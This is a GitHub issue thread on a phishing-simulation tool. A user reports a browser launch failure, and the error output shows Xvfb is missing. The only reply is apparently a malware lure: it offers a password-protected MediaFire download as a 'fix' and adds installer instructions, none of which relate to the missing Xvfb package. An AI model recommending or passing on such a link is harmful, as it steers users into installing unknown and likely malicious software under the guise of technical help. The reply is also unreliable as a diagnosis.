### ISSUE TITLE
Failed to launch the browser process

### ISSUE THREAD

**Issue by J33R4FF3** [fkasler/cuddlephish#8]
Hi

Firstly, thank you for a great phishing series and what looks to be an awesome tool. I am trying to get it up and running to play around with this technique. I built a brand new Debian VM on azure.

```
Linux Cuddle 5.10.0-32-cloud-amd64 #1 SMP Debian 5.10.223-1 (2024-08-10) x86_64 GNU/Linux

Architecture:                         x86_64
CPU op-mode(s):                       32-bit, 64-bit
Byte Order:                           Little Endian
Address sizes:                        46 bits physical, 57 bits virtual
CPU(s):                               2
On-line CPU(s) list:                  0,1
Thread(s) per core:                   2
Core(s) per socket:                   1
Socket(s):                            1
NUMA node(s):                         1
Vendor ID:                            GenuineIntel
CPU family:                           6
Model:                                106
Model name:                           Intel(R) Xeon(R) Platinum 8370C CPU @ 2.80GHz
Stepping:                             6
CPU MHz:                              2230.990
BogoMIPS:                             5586.87
Virtualization:                       VT-x
Hypervisor vendor:                    Microsoft
Virtualization type:                  full
```
Following the steps in the install guide gives me the following warnings:

```
npm WARN deprecated string-similarity@4.0.4: Package no longer supported. Contact Support at https://www.npmjs.com/support for more info.
npm WARN deprecated puppeteer@13.7.0: < 19.4.0 is no longer supported

```
When running the tool I get the following error and as you would expect, I assume,  I am presented with a blank white page (although the browser tab is correctly displayed).

```
Error: spawn Xvfb ENOENT
  at Process.ChildProcess._handle.onexit (internal/child_process.js:268:19)
  at onErrorNT (internal/child_process.js:470:16)
  at processTicksAndRejections (internal/process/task_queues.js:84:21) {
  errno: 'ENOENT',
  code: 'ENOENT',
  syscall: 'spawn Xvfb',
  path: 'Xvfb',
  spawnargs: [ ':99', '-screen', '0', '2880x1800x24', '-ac' ]
}
(node:2705) UnhandledPromiseRejectionWarning: Error: Failed to launch the browser process!
[2718:2718:0831/044557.934269:ERROR:browser_main_loop.cc(1512)] Unable to open X display.


TROUBLESHOOTING: https://github.com/puppeteer/puppeteer/blob/master/docs/troubleshooting.md

at onClose (/home/azureuser/cuddlephish/node_modules/puppeteer/lib/Launcher.js:750:14)
at ChildProcess.<anonymous> (/home/azureuser/cuddlephish/node_modules/puppeteer/lib/Launcher.js:740:61)
at ChildProcess.emit (events.js:326:22)
at Process.ChildProcess._handle.onexit (internal/child_process.js:276:12)
(node:2705) UnhandledPromiseRejectionWarning: Unhandled promise rejection. This error originated either by throwing inside of an async function without a catch block, or by rejecting a promise which was not handled with .catch(). To terminate the node process on unhandled promise rejection, use the CLI flag `--unhandled-rejections=strict` (see https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode). (rejection id: 1)
(node:2705) [DEP0018] DeprecationWarning: Unhandled promise rejections are deprecated. In the future, promise rejections that are not handled will terminate the Node.js process with a non-zero exit code.
```

Wondering if you have come across this error and if the two messages might be connected? I am by no means an experienced Linux/npm user/troubleshooter so just did a few basic google checks for the error and puppeteer versions etc.

Thank you in advance for any assistance you can provide

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
